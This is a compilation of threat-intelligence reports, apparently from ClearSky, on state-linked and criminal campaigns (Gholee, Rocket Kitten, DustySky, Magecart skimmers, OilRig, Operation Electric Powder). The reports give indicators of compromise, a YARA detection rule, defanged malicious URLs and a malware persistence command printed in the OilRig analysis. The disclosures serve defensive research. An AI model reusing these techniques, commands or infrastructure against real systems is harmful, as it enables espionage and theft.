Introduction

During the 2014 Israel–Gaza conflict, dubbed by Israel as “operation protective edge”, a raise in cyber-attacks against Israeli targets was reported. In this report we analyze one case of an operation protective edge themed spear phishing attack. That email contained a malicious excel file, which once opened and its VBA code executed, would infect the victim’s computer.

As for the publication of this report, the file is recognized as malicious by only one antivirus engine.

Based on our analysis, we believe the threat actor behind this malware is a high level professional.

Gholee

Our investigation of the Gholee malware started following a detection of a suspicious file that was sent in an email to an undisclosed recipient. The file name was ‘Operation Protective Edge.xlsb’ (MD5: d0c3f4c9896d41a7c42737134ffb4c2e).

The file was uploaded to Virus Total the first time on 10 August 2014, from Israel. At that time it was not detected as malicious by any of the 52 tested antivirus engines. Nine days later, it was uploaded again to Virus total, again from Israel. This time it was detected as malicious only by Kaspersky, as Trojan-Dropper.MSExcel.Agent.ce.

Infection

Upon opening the file a message is displayed, saying:

“Due to security considerations I consciously hid the Informations. It will be visible for you by enabling content above.”

This is a social engineering tactic meant to lure the victim into enabling Macro content. If enabled, the message disappears, and the following information is presented to the victim (it is possible that the unreadable characters in the screenshot below are the result of an encoding error in our lab environment, and that the victim would see different, readable content).

Technical Analysis

Code

Analysis of the Macro code reveals the following structure:

In order to avoid detection by protection measures such as computer antivirus and intrusion detection systems, ASCII characters codes are used instead of actual characters. The ASCII codes are converted to strings as they are concatenated into a single variable within a function

Tens of these functions then concatenated, creating a single PE file

Finally, the file is saved to NTUSER.data.{GUIDE}.dll (MD5: 48573a150562c57742230583456b4c02) and the function ShellExecte  is used to run it under cmd.exe /C and Rundll32  This is in order to hide the process.

The Dll file is obfuscated and includes various mechanism to hide from Debuggers such as Ollydbg and IDA and from Sandbox software such as Cuckoo and Anubis.

Analyzing the file, we have found an interesting entry point called gholee.

A quick Facebook search for that name and Iran discovered Gholee is a popular Iranian singer:

Communication

When run, the DLL file is communicating with a Kuwait based IP address: 83.170.33.60, owned by German company iABG Mbh, which provides satellite communication services.

The malware opens an SSL connection over port 443 using a digital certificate that expired in 2010. The certificate was issued for security company Core Security, the creators of the offensive suite Core Impact, for the address *coreimpactagent.net.

It was issued by Thawte certificate authority.

​Certificate Fingerprint MD5: 9C 80 C2 47 40 6D 6C ED FC E0 08 AE EF D9 98 90

Using a proxy and SSL stripping, the following communication pattern over HTTP can be seen:

GET                        /index.php?c=Ud7atknq&r=17117d        HTTP/1.1

POST                     /index.php?c=Ud7atknq&r=1710b2        HTTP/1.1

Related incidents

Searching for specific strings from the malicious file, we found another file that we believe is related to this campaign. The file name is “svchost 67.exe” (MD5: 916be1b609ed3dc80e5039a1d8102e82 ) and it was uploaded to Virus Total[5] on 2 June 2014, more than two months earlier than “Operation Protective Edge.xlsb”. It was uploaded twice from Latvia – potentially to test the malware’s detection rate.

“svchost 67.exe” communicated with 83.170.33.37, which is on the same /26 netblock as the address “Operation Protective Edge.xlsb” is commutating with.

Detection and prevention

• By using GPO to disable macro code from running, infection by this malware may be avoided.  Alternatively, files containing macro code should be blocked at the email gateway or by an anti-spam solution.
• Logs and proxy servers should be checked for communication with the IP addresses with which the malware communicates:

83.170.33.60

83.170.33.37

• If you think you got infected, check in the system root folder for a file called NTUSER.DAT.{$GUID}.dll . for example:

NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0b**c}.dll

• The following Yara rule may be used to detect the gholee malware:

rule gholee

{

meta:

author = “www.clearskysec.com”

date = “2014/08”

maltype = “Remote Access Trojan”

filetype = “dll”

strings:

$a = “sandbox_avg10_vc9_SP1_2011”

$b = “gholee”

condition:

all of them

}

Recently Clearsky’s researchers collaborated with PwC’s intelligence team while investigating Attacks against Israeli & Palestinian interests.

The full post can be read at PwC’s Cyber security updates blog.

Here’s the excerpt:

“This short report details the techniques being used in a series of attacks mostly against Israel-based organisations. The decoy documents and filenames used in the attacks suggest the intended targets include organisations with political interests or influence in Israel and Palestine. Although we are unable to link this campaign to any already documented in open source, it bears similarities to some described by others previously

The earliest samples in the campaign we have identified date back to the summer of 2014. The number of samples discovered and relatively small scale of infrastructure suggest the attackers have limited resources with which to conduct attacks.

This report reviews an ongoing cyber-attack campaign dating back to mid-2014. Additional sources indicate it may date as far back as 2011. We call this campaign Thamar Reservoir, named after one of the targets, Thamar E. Gindin, who exposed new information about the attack and is currently assisting with the investigation.

The campaign includes several different attacks with the aim of taking over the target’s computer or gain access to their email account. We estimate that this access is used for espionage or other nation-state interests, and not for monetary gain or hacktivism. In some cases, the victim is not the final target; the attackers use the infected computer, email, or stolen credentials as a platform to further attack their intended target.

The attackers are extremely persistent in their attempts to breach their targets.  These attempts include:

• Breaching trusted websites to set up fake pages
• Multi-stage malware
• Multiple spear phishing emails based on reconnaissance and information gathering.
• Phone calls to the target.
• Messages on social networks.

While very successful in their attacks – the attackers are clearly not technically sophisticated. They are not new to hacking, but do make various mistakes – such as grammatical errors, exposure of attack infrastructure, easy to bypass anti analysis techniques, lack of code obfuscation, and more.

These mistakes enabled us to learn about their infrastructure and methods. More importantly, we have learned of 550 targets, most of them in the Middle East, from various fields: research about diplomacy,  Middle East and Iran, international relations, and other fields; Defense and security; Journalism and human rights; and more.

Below is the target distribution by country (click the image for full size):

Various characteristics of the attacks and their targets bring us to the conclusion that the threat actors are Iranian. In addition, we note that these attacks share characteristics with previously documented activities:

• Attacks conducted using the Gholee malware, which we discovered.
• Attacks reported by Trend Micro in Operation Woolen-Goldfish.
• Attacks conducted by the Ajax Security Team as documented by FireEye.
• Attacks seen during Newscaster as documented by iSight.

Read the full report: Thamar Reservoir – An Iranian cyber-attack campaign against targets in the Middle East

In the past few months ClearSky and Trend Micro have been monitoring  and analyzing the Iranian cyber-attack group known as “Rocket Kitten”. The following report uncovers new attacks performed by the group, its methods and operations.

Rocket Kitten has been operating since at least mid-2014. The group operates against numerous targets in the middle-east including Israelis, Iranian exiles, and enemies of Iran. The targets are researchers and practitioners in the fields of policy, government and international relations, security, defense, journalism, human rights, and others.

The group heavily relies on social engineering, and it is persistent and targeted. Each target is repeatedly attacked using a variety of techniques, such as phone calls, SMS messages, Facebook messages, dedicated phishing websites, and spear phishing.

Our research suggests that the group’s intention is to obtain sensitive information and perform espionage, as they are ideologically motivated.

Previous reports about Rocket Kitten include ClearSky’s Gholee and “Thamar Reservoir“, and  Trend Micro’s Operation Woolen-Goldfish.  Last week Citizen Lab published Two-Factor Authentication Phishing From Iran. The  group was analyzed in a presentation at the Chaos Communication Congress (CCC).

The new joint report – “Rocket Kitten 2” includes incidents from the pass few months, among them one in which the group tried to impersonate a Clearsky analyst and attempted to infect the target by usurping Trend Micro HouseCall.

The report includes the following sections:

• Rocket Kitten attacker profile
• The group’s targets and goals
• Tactics and tools
• Case studies
• Safety measures and recommendations

Read the full report: The Kittens Strike Back: Rocket Kitten Continues Attacks on Middle East Targets

CopyKittens is an espionage group that has been attacking Israeli targets since at least August 2014. Among the targets are high ranking diplomats at Israel’s Ministry of Foreign Affairs and well-known Israeli academic researchers specializing in Middle East Studies.

Matryoshka is the name we gave the malware built by CopyKittens. It is a multi-stage framework, with each part integrates into the subsequent one. CopyKittens assembled Matryoshka from code snippets picked from public repositories and online forums, hence their nickname.

Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable, or an embedded executable the victim is asked to open.

DNS requests and answers are used for command and control communication and for data exfiltration.

Based on the type of targets, delivery, and malware used – we estimate that CopyKittens are a state actor or are endorsed by one.

This report was produced by Minerva labs and ClearSky.

Read the full report: The CopyKittens attack group.

DustySky (called “NeD Worm” by its developer) is a multi-stage malware in use since May 2015. It is in use by the Molerats (aka Gaza cybergang), a politically motivated group whose main objective, we believe, is intelligence gathering.  Operating since 2012, the group’s activity has been reported by Norman ^[1], Kaspersky^[2] [3], FireEye^[4], and PwC^[5].

This report revolves around a campaign that includes a new malware developed by a member of the group or on behalf of the group. Based on dozens of known attacks and the vast infrastructure in use – we estimate that a wave of targeted malicious email messages has been sent on a weekly basis.

These attacks are targeted, but not spear-phished. I.e., malicious email messages are sent to selected targets rather than random mass distribution, but are not tailored specifically to each and every target. Dozens of targets may receive the exact same message. The email message and the lure document are written in Hebrew, Arabic or English – depending on the target audience.

Targeted sectors include governmental and diplomatic institutions, including embassies; companies from the aerospace and defence Industries; financial institutions; journalists; software developers.

The attackers have been targeting software developers in general, using a fake website pretending to be a legitimate iOS management software, and linking to it in an online freelancing marketplace.

Most targets are from the Middle East: Israel, Egypt, Saudi Arabia, United Arab Emirates and Iraq. The United States and countries in Europe are targeted as well.

Read the full report: Operation DustySky
Indicators file: DusySky-indicators.xlsx  (DustySky indicators are tagged as such in PassiveTotal)

If you have been targeted with DustySky, or have questions about the report, please contact us at:
info[at]clearskysec.com

Also see “Operation DustySky Notes” by PassiveTotal for further discussion about the malicious infrastructure.

Acknowledgments

We would like to thank our colleagues for their ongoing information sharing and feedback, which have been crucial for this research: security researcher Infra; PassiveTotal analyst team; Tom Lancaster of PwC ;Team Cymru; Security researcher Sebastián García; Menachem Perlman of LightCyber; Other security researchers who wish to remain anonymous.

[1] https://github.com/kbandla/APTnotes/blob/master/2012/Cyberattack_against_Israeli_and_Palestinian_targets.pdf

[2] http://www.seculert.com/blog/2014/01/xtreme-rat-strikes-israeli-organizations-again.html

[3] https://securelist.com/blog/research/72283/gaza-cybergang-wheres-your-ir-team

[4] https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

[5] http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html

Operation DustySky – Part 2 is a follow-up on our DustySky operation report from January 2016. It analyses new attacks by Molerats against targets in Israel, The United States, Egypt, Saudi Arabia, United Arab Emirates and The Palestinian Authority.

We elaborate on the scope and targeting of the DustySky campaign and expose new infrastructure and incidents. In addition, we expose the identity of an individual who is behind the DustySky campaign. Following the previous report, this individual has contacted us trying to learn what we know about him.

Attacks against all targets in the Middle East stopped at once after we published the first report. However, the attacks against targets in the Middle East (except Israel) were renewed in less than 20 days. In the beginning of April 2016, we found evidence that the attacks against Israel have been renewed as well.

Based on the type of targets, on Gaza being the source of the attacks, and on the type of information the attackers are after – we estimate with medium-high certainty that the Hamas terrorist organization is behind these attacks.

Read the full report: Operation DustySky
Indicators file: DusySky2-indicators (also available on PassiveTotal)

If you have been targeted with DustySky, or have questions about the report, please contact us at:
info[at]clearskysec.com

Acknowledgments

This research was facilitated by the PassiveTotal for threat infrastructure analysis.
We would like to thank the security researchers and organizations who shared information and provided feedback, which have been crucial for this research.

Since March 2016, numerous credit cards and other details have been stolen during payment from dozens of online shops worldwide. Malicious JavaScript code acting as a form grabber or a simple “cloud based” keylogger was injected into breached shops. As buyers filled in their payment details, the data was captured and sent in real time to the attacker.

This means that the information got stolen even if the seller worked according to PCI standards and did not keep credit card details in a database after purchase completion. This method is different than other ways of stealing payment details, such as infecting the buyer’s computer, implanting malware in Point of Sale terminals, or dumping entire databases from breached online shops.

In this post we analyze the malicious code and other parts of the campaign. RiskIQ, who we collaborated with on the investigation, dubbed this campaign Magecart. In parallel to this post, they are publishing a report reviewing other parts of the malicious infrastructure and compromised websites.

Security company Sucuri revealed parts of this campaign back in July 30. Since, the attackers kept registering new domains and used them to host malicious JavaScript files, later injecting them into breached online shops.

Malicous JavaScript injection in breached shops

In order to implant the malicious JavaScript code, the attackers first had to get access to change the source code of the website. They might have gained this access by exploiting a vulnerability in the web platform (such as Magento Commerce, Powerfront CMS, OpenCar, etc’) or by getting a hold of admin credentials.

Then, the attacker would add a <script> tag, loading JavaScript from one of tens of domains they own.

Below are screenshots of the source code in three different breached websites, showing the injected malicious JavaScript:

In order to deceive security researches, in some cases visiting the root domain or the IP to which it points would return an empty page redirecting to google.com.

Valid SSL certificates

The malicious JavaScript code is served over HTTPS with a Valid SSL certificate. Using HTTPS is important for the attacker to keep its malicious activity undetected, because script loaded over HTTP would trigger a “mixed content” warning to the user.

below are some of the certificates used in the campaign:

js-abuse[.]su

Serial : ‎00 94 6e 7c aa 678e de 0c 33 c9 ee 01 d1 ff 36 fd
Sha1 Thumbprint :63 ff a2 6b b9 45 46 99 00 8f c2 ff 24 38 76 68 cf 3a 8e 93

cdn-js[.]link

Serial : ‎ ‎00 b5 ac fc 35 dc db 7b 3b 44 3e e2 61 ba 9d d7 a1
Sha1 Thumbprint :15 68 f9 67 5b c5 79 db 30 7f 52 01 dc 52 98 36 31 14 9e ef

statsdot[.]eu

Serial : ‎ ‎ ‎03 16 90 9f 7a d1 dd c5 2f c3 5c 7a 8c f2 c8 be 40 b0
Sha1 Thumbprint :‎e6 28 c2 92 8c 4e 01 f5 a0 23 c0 12 52 71 45 b6 c7 25 f5 f7

stat-sj[.]link

Serial : ‎ ‎ ‎ 00 bd 60 18 62 e8 30 d6 17 f1 c9 b1 45 76 67 2d f8
Sha1 Thumbprint :6e 6e 30 78 26 ee 2e 46 56 ad e7 bd 9e c4 71 23 d1 03 61 ac

js-mod[.]su

Serial : ‎ ‎ ‎ 00 80 df 54 15 a6 96 99 06 20 86 4a 6b 42 e2 cf 74
Sha1 Thumbprint :18 e7 aa 7b 44 bc 12 16 c0 25 75 dd 52 25 1e 4c 33 44 ef c9

sj-mod[.]link

Serial : ‎ ‎ ‎ ‎73 07 83 4d 3b bf 49 4f 09 48 67 a8 b1 67 66 a2
Sha1 Thumbprint :46 b9 73 f6 ec dc 44 4c 26 78 51 bb 20 c9 23 a1 d2 42 ff fd

Credit card stealer functionality

The functionality of the credit card stealer is simple. Key parts are described below.

After data is filled by the buyer in form fields, attributes of the fields are checked against a predefined array.  The array is composed of attributes used in the targeted payment platform, for example:

If any of the fields are present, the value of each and every input field in the page is collected into a variable, along with the host (i.e. the web address of the form):

The collected data is sent via an AJAX PSOT request to a URL in one of the malicious domains the attacker owns.

Different versions of this basic code are used over the campaign. In some cases, the code is served obfuscated.

Infrastructure

We used PassiveTotal to pivot off of IPs (such as 80.87.205.145) and Whois details (such as a registrant email – rudneva-y@mail.ua) to find further malicious domains:

This resulted in four clusters, sharing properties such as registrant email address and date of registration.

The full list of malicious domains, compromised eCommerce websites, and other Indicators of compromise can be found at RiskIQ’s post “Compromised eCommerce Sites Lead to Web-Based Keyloggers” (A Hebrew version is available).

Clearsky Security regularly monitors and tracks phishing and fraud  campaigns by looking for impersonating domain names. Recently we detected multiple domains impersonating shipping and logistics companies being registered. We suspect that these companies have become the target of Business Email Compromise scams (aka BEC or “CEO fraud”)

Targeted organisations include Singaporean Executive Ship Management, VersaCold (Canada’s largest supply chain company), and Tollgroup (the/ leading provider of express road-freight within Australia) and more.

In the case of VersaCold, the malicious domain registered is versacoldl[.]com, impersonating versacold.com. In the case of Executive Ship Management, the malicious domain is executiveshlp[.]com which impersonates executiveship.com (l instead of i). And for Toll Group, tollgroup-as[.]com was registered instead of tollgroup.com.

This campaign targets companies in other industries as well, for example IKEA group, Amdocs, and Russian Standard (the biggest Russian Vodka brand).

The registrant name used in of all these domains is “Ian Stingly”, with email address ian.gold@millindrinks.com. By conducting Reverse Whois search using domaintools.com, we can see other impersonating domains registered with these details (shipping and logistics companies are marked in red):

This kind of malicious activity serves to create infrastructure for Business Email Compromise scams. These scams usually start with an email from the “CEO” to employees from a domain name similar to the real one. Between October 2013 and February 2016, the FBI received reports from 17,642 companies that lost $2.3 billion in BEC fraud.

Companies can mitigate this threat by :

1. Monitoring for new domains that may impersonate the  organization and block them as soon as possible.
2. Increasing employee awareness, in various ways, including periodical training sessions and publishing advisories about the threat.

Hundreds of customer service centers have been targeted In a campaign going back at least to August 2016.

An email is sent to the “contact us” or “customer support” address of an online shop. The sender pretends to be a a customer that has a problem with the online shopping cart or is just asking to make sure products are available in stock.

The sender attaches a Word document to the email, and says that it lists the items he or she would like to purchase, or otherwise tries to entice the recipient to open the document.

For example:

Hello Customer Support,

I would like to place an order on <name of organisation>, however not certain if a couple items are in Stock. I have listed in the enclosed doc all I am interested in purchasing, can you review it and confirm if you have it in stock?

Thank you for your assistance.

Best Regards!

The Word documents contains Macro code that would infect the computer if enabled by the recipient.

In the samples we analysed, the malicious document communicated to the following address:

http://excelcenter[.]ro/port10/owalogon.asp

Samples

Below are 30 samples from the campaign, hundreds more exist. Note that the name of the malicious documents usually includes the domain name of the targeted company with a .doc suffix.

Ocovildovinil.Pt.doc
df8dfdad1eef284ea90c30a903a4692bd6cc4fca0e3a5b682b07bf7de977cdfb

Oponeo.Pl.doc
de2d892c281cba898cec22cd93ca26a22cb631f910c5c88d7bd4336b3cd8b1ee

Edelweissfin.Com.doc
d274f0568f19066aa374339033607a07d8c2f243437edbbcfd4e30605a8ffe28

Eslite.Com.doc
7bfffdb966111459a745a10a9f515025af299ea5f69ab727619b2551dbda9aa2

Outdoorsportstravel.Asia.doc
865dbf107da63ff91fb3af3331b759f774203c20ddc833e8741227ca16ae2e48

Luxapool.Com.Au.doc
cf8b8704a4cf106fff62d16d8b1986523b8d1e54cbed8dc10c766d9ec8799d8f

Biminitop.De.doc
c4722b56730643f41b1829effbd31173a1fd84a0465d7bd54ee322c4c4b373f9

Blaudruckstoffe.De.doc
4e0838501907cdc08c6dbc2f4ac2d77f4567bb59743f205259c777988b3bb41b

Innout.Com.doc
6e64874bf64194d06201063c5afbc838019c804e6c22b3d30366e6f65e81a16e

Triodepot.Com.doc
60a53af4e63a1205ccd766223c8bf4d77cebb252b3c8585113fbf8b7002c0717

Tailoredliving.Com.doc
cf7746f4700e06091a92abf8a04bcf24108aa5159fffbb5125caaa2bea0440ad

Tsrhockey.Com.doc
f9680d3ca4a9579c065fedbc51d5b4edf229568fc88062c7f35b5d07c3ed87ee

Priberam.Pt.doc
5fbb01dae7d1a7791830b389ce9477fadc9796e1a254a22b639cdcb481031b9f

Pctvsystems.Com.doc
56c5c92907e5b8cfa807356f11eb9cc6bc64fe4a49b1eb88ac7f30a339e5d6be

Sickkidsfoundation.Com.doc
a712db7e2b022ee49c26fd1f188e9c9df7dd810c3e1f279e53435284acb44215

Agawa.Pl.doc
450c4793d0b8ba6d3a7294812e371971de481e3a0ed174cd3a7e3bdfafaa6ee4

Sm-Moto.Com.doc
ad30c40320561b2fe01420c287add294c4cdc459ee9a24fb4ccaa5a8f472267c

Guggenheiminvestments.Com.doc
0f1770106a960329f978986209e5918e0e6539f80bcf2f3719d23ce39c5cc1b9

Voedingscentrum.Nl.doc
9fe0bd7031f42252c6dc0b9ac41f33e252d7a067a8eb68ec51cf3c5cbb2acdcc

Danskebank.Fi.doc
c816ff922125cf17db3780a6f0027b106d713e7fde4f63efd7f9d11f78b4114f

Thisisaka.Com.doc
54e83553714a5fa6fc249f870c0200e5a679cd5ec2f17b3d3168bbcdf7eec869

Bristolwest.Com.doc
67657c4bdb9968f14ceed73942bf71c341ae9264bd474884b363e840b5d60470

Dokomo.Be.doc
eab3b8a4240bdebde634312d08737586fd1111651fc4980a1254439d436086fe

Rikstoto.No.doc
59d4307d35f35cbca00131c43bb28b48acac3035f7b7ecfcc9b91009de8f7ef0

Maisondelin.Fr.doc
525e40bd5997bfc48e4b76add60b21faff238d1913bf6964bdcbc3c753b71026

Moposport.Fi.doc
8fac72b5c5063411645c7d7d5201b55aaf37fa3201029f783b7be1ab178732d1

Lichtkoepeltje.Nl.doc
9938208842966e9b7505cffec36ef19b0668843bb534d65a7568e484a7a29b28

Gartenmoebel24.De.docx
1770de62c68d4d2325926dce555b70477a6baa02faf87384f69c5adc5ac7e514

Komino.Pl.doc
4f2110e091a5f86e8952748e788bc0cb38905c60d91e01edcdce43047db119e6

Skins.Net.doc
839347259d1f063e3f2b9bc09c5257ff287c1064349350a8407eb5a9188eb092

Acknowledgments

We would like to thank Matan Scharf of Cycuro for his assistant in the investigation.

Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015. In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors, several financial institutes, and the Israeli Post Office.

Later, the attackers set up two fake websites pretending to be a University of Oxford conference sign-up page and a job application website. In these websites they hosted malware that was digitally signed with a valid, likely stolen code signing certificate

Based on VirusTotal uploads, malicious documents content, and known victims – other targeted organisations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon.

Fake VPN Web Portal

In one of the recent cases, the attackers sent the following email to individuals in targeted organisations:

The email was sent from a compromised account of an IT vendor. Similar emails were sent from other IT vendors in the same time period, suggesting the attackers had a foothold within their networks, or at least could get access to specific computers or email accounts.

The link provided in the malicious email led to a fake VPN Web Portal:

Upon logging in with the credentials provided in the email, the victim is presented with the following page:

The victim is asked to install the “VPN Client” (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside).

The “VPN Client” is a legitimate Juniper VPN software bundled with Helminth,  a malware in use by the OilRig threat agnet:

JuniperSetupClientInstaller.exe
6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link)

If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed. The legitimate and the malicious installations can be seen in the process tree when the file is run in a Cuckoo sandbox. Malicious processes are marked red (click image to enlarge):

The following malicious files are dropped and run:

• C:\ProgramData\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\OFFLINE\9A189DFE\C7B7C186\main.vbs
  dcac79d7dc4365c6d742a49244e81fd0
• C:\Users\Public\Libraries\RecordedTV\DnE.ps1
  7fe0cb5edc11861bc4313a6b04aeedb2
• C:\Users\Public\Libraries\RecordedTV\DnS.ps1
  3920c11797ed7d489ca2a40201c66dd4
• “C:\Windows\System32\schtasks.exe” /create /F /sc minute /mo 3 /tn “GoogleUpdateTasksMachineUI” /tr C:\Users\Public\Libraries\RecordedTV\backup.vbs
  7528c387f853d96420cf7e20f2ad1d32

Command and control server is located in the following domain:

tecsupport[.]in

A detailed analysis of the malware is provided in two posts by Palo Alto networks and in a post by FireEye, which wrote about previous campaigns by this threat agent.

(Note that Juniper networks was not compromised nor otherwise involved in the attack, except for the attackers using its name and publicly available software).

Digitally signed malware

The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software:

Thumbprint: F340C0D841F9D99DBC289151C13391000366631C
Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09

Another Helminth sample, 1c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate:

Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A
Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48

This suggest that the attackers had got a hold of an AI Squared signing key, potentially after compromising their network. Alternatively, the attackers might have got Symantec to issue them a certificate under AI Squared’s name.

University of Oxford impersonation

The attackers registered four domains impersonating The University of Oxford.

oxford-symposia[.]com, is a fake Oxford conference registration website. Visitors are asked to download the “University Of Oxford Job Symposium Pre-Register Tool”:

The downloaded file (which is also signed with an AI Squared certificate), is a fake registration tool built by the attackers:

OxfordSymposiumRegTool.exe
f77ee804de304f7c3ea6b87824684b33

If run by the victim, their computer would get infected, while they are shown this registration process:

Note that after completing the “registration process”, the victim is asked to send the form to an email address in oxford-careers[.]com, which also belongs to the attackers.

Previously the fake website linked to the following documents in a third fake Oxford domain, oxford[.]in:

http://oxford[.]in/downloads/ls1.doc
http://oxford[.]in/downloads/ls2.doc
http://oxford[.]in/downloads/ls3.doc
http://oxford[.]in/downloads/ls4.do

The documents were unavailable during our research, and their content is unknown to us.

The attackers used a forth domain, oxford-employee[.]com, to host an “Oxford Job application” website:

Visitors are asked to “Download CV Creator” in order “To Join University of Oxford staff”. CV Creator is a malicious file hosted at http://www.oxford-careers[.]com/Files/OxfordCVCreator.exe :

OxfordCVCreator.exe
5713c3c01067c91771ac70e193ef5419

When run, the victim is again presented with a tool created by the attackers, this time a “University Of Oxford Official CV Creator”:

Both samples mentioned in this section had the following domain used for command and control:

updater[.]li

Other incidents

In an earlier incident, the attackers sent a malicious excel file impersonating Israir, an Israeli Airline  (the content of the file was copied from the company’s public website and we have no indication of it being compromised or targeted):

Israel Airline.xls
197c018922237828683783654d3c632a

Attackers have been trying to breach IEC (Israel Electric Company) in a year-long campaign.

From April 2016 until at least February 2017,  attackers have been spreading malware via fake Facebook profiles and pages, breached websites, self-hosted and cloud based websites. Various artifacts indicate that the main target of this campaign is IEC – Israel Electric Company. These include domains, file names, Java package names,  and Facebook activity. We dubbed this campaign “Operation Electric Powder“.

Israel Electric Company (also known as Israel Electric Corporation) “is the largest supplier of electrical power in Israel. The IEC builds, maintains, and operates power generation stations, sub-stations, as well as transmission and distribution networks. The company is the sole integrated electric utility in the State of Israel. It installed generating capacity represents about 75% of the total electricity production capacity in the country.”

It is notable that the operational level and the technological sophistication of the attackers are not high. Also, they are having hard time preparing decoy documents and websites in Hebrew and English. Therefore, in most cases a vigilant target should be able to notice the attack and avoid infection. We do not have indication that the attacks succeeded in infecting IEC related computers or stealing information.

Currently we do not know who is behind Operation Electric Powder or what its objectives are. See further discussion in the Attribution section.

Impersonating Israeli news site

The attackers registered and used in multiple attacks the domain ynetnewes[.]com (note the extra e). This domain impersonates ynetnews.com, the English version of ynet.co.il – one of Israel’s most popular news sites.

Certain pages within the domain would load the legitimate Ynet website:

Others, which are opened as decoy during malware infection, had copied content from a different news site:

The URL ynetnewes[.]com/video/Newfilm.html contained an article about Brad Pitt and Marion Cotillard copied from another site. At the bottom was a link saying “Here For Watch It !”:

The link pointed to goo[.]gl/zxhJxu (Google’s URL shortening service). According to the statistics page, it had been created on September 25, 2016 and have been clicked only 11 times. When clicked, it would redirect to iecr[.]co/info/index_info.php .

We do not know what was the content in the final URL. We estimate that it served malware. The domain iecr[.]co was used as a command and control server for other malware in this campaign.

Another URL,   http://ynetnewes[.]com/resources/assets/downloads/svchost.exe

hosted a malware file called program_stream_film_for_watch.exe.
(d020b08f5a6aef1f1072133d11f919f8)

Fake Facebook profile – Linda Santos

One of the above mentioned malicious URLs was spread via comments by a fake Facebook profile – Linda Santos (no longer available):

In September 2016, the fake profile commented to posts by Israel Electric Company:

The profile had dozens of friends, almost all were IEC employees:

The fake profile was following only three pages, one of which was the IEC official page:

Pokemon Go Facebook page

In July 2016, when mobile game “Pokemon Go” was at the peak of its popularity, the attackers created a Facebook page impersonating the official Pokemon Go page:

The page, which is no longer available, had about one hundred followers – most were Arab Israelis and some were Jewish Israelis.

Only one post was published, with text in English and Hebrew.  Grammatical mistakes indicate the attackers are not native to both languages:

The post linked to a malicious website hosted in yolasite.com (which is a legitimate website building and hosting platform):

pokemonisrael.yolasite[.]com

The button – “להורדה טלפון ומחשב” (literal translation – “To download phone and computer”) linked to a zip file in another website:

http://iec-co-il[.]com/iec/electricity/Pokemon-PC.zip

Note that the domain being impersonated is that of Israel Electric Company’s website (iec.co.il).

Pokemon-PC.zip (40303cd6abe7004659ca3447767e4eb7) contained Pokemon-PC.exe (e45119a72677ed15ee0f04ef936a9803), which at run time drops monitar.exe  (d3e0b129bad263e6c0dcb1a9da55978b):

Android phone malware

The attackers also distributed a malicious app for Android devices – pokemon.apk (3137448e0cb7ad83c433a27b6dbfb090). This malware also had characteristics that impersonate IEC, such as the package name:

The application is a dropper that extracts and installs a spyware. The dropper does not ask for any permission during installation:

However, when the spyware is installed,  it asks for multiple sensitive permissions:

The victim ends up with two applications installed on their device. The Dropper, pretending to be a Pokemon Go app, adds an icon to the phone dashboard. However, it does not have any functionality, and when clicked, this error message is displayed:

Error 505
Sorry, this version is not compatible with your android version.

The dropper does not really check what android version is installed:

The message is intended to make the victim believe that the Pokemon game does not work because of compatibility issues.

The victim is likely to uninstall the application at this point. However, because a second application was installed, the phone would stay infected unless it is uninstalled as well.

Websites for Malware distribution

Malware was also hosted in legitimate breached Israeli websites, such as this educational website:

http://www.bagrut3.org[.]il/upload/edu_shlishit/passwordlist.exe (defc340825cf56f18b5ba688e6695e68)

and a small law firm’s website:

http://sheinin[.]co.il/MyPhoto.zip (650fcd25a917b37485c48616f6e17712)

In journey-in-israel[.]com, the attackers inserted an exploit code for CVE-2014-6332 – a Windows code execution vulnerability. The exploit was copied from an online source, likely from here, as the code included the same comments. The website also hosted this malware: afd5288d9aeb0c3ef7b37becb7ed4d5c.

In other cases, the attackers registered and built malicious websites: users-management[.]com and sourcefarge[.]net (similar to legitimate software website sourceforge.net). The latter was redirecting to journey-in-israel[.]com and iec-co-il[.]com in May and July 2016, according to PassiveTotal:

Sample 24befa319fd96dea587f82eb945f5d2a, potentially only a test file, is a self-extracting archive (SFX) that contains two files: a legitimate Putty installation and link.html: 

When run, while putty is installed, the html file is opened in a browser and redirects to http://tinyurl[.]com/jerhz2a and then to http://users-management[.]com/info/index_info.php?id=9775. The last page 302 redirects to the website of an Israeli office supply company Mafil:

Sample f6d5b8d58079c5a008f7629bdd77ba7f , also a self-extracting archive, contained a decoy PDF document and a backdoor:

The PDF, named IEC.pdf, is a warranty document taken from Mafil’s public website. It is displayed to the victim while the malware (6aeb71d05a2f9b7c52ec06d65d838e82) is infecting its computer:

Windows Malware

The attackers developed three malware types for Windows based computers:

• Dropper – self-extracting archives that extract and run the backdoor, sometimes while opening a decoy PDF document or website.
  (For example: 6fa869f17b703a1282b8f386d0d87bd4)
• Trojan backdoor / downloader –  malware that collects information about the system and can download and execute other files. (909125d1de7ac584c15f81a34262846f)
  Some samples had two hardcoded command and control servers: iecrs[.]co and iecr[.]co (note once again the use of IEC in the domain name).
• Keylogger / screen grabber – records keystrokes and takes screenshots. The malware file is compiled Python code. (d3e0b129bad263e6c0dcb1a9da55978b)

An analysis of the malware and other parts of the campaign was published by Mcafee in on November 11, 2016.

The latest known sample in this campaign (7ceac3389a5c97a3008aae9a270c706a) has compilation timestamp of February 12, 2017.  It is dropped when “pdf file products israel electric.exe” (c13c566b079258bf0782d9fb64612529) is executed.

Attribution

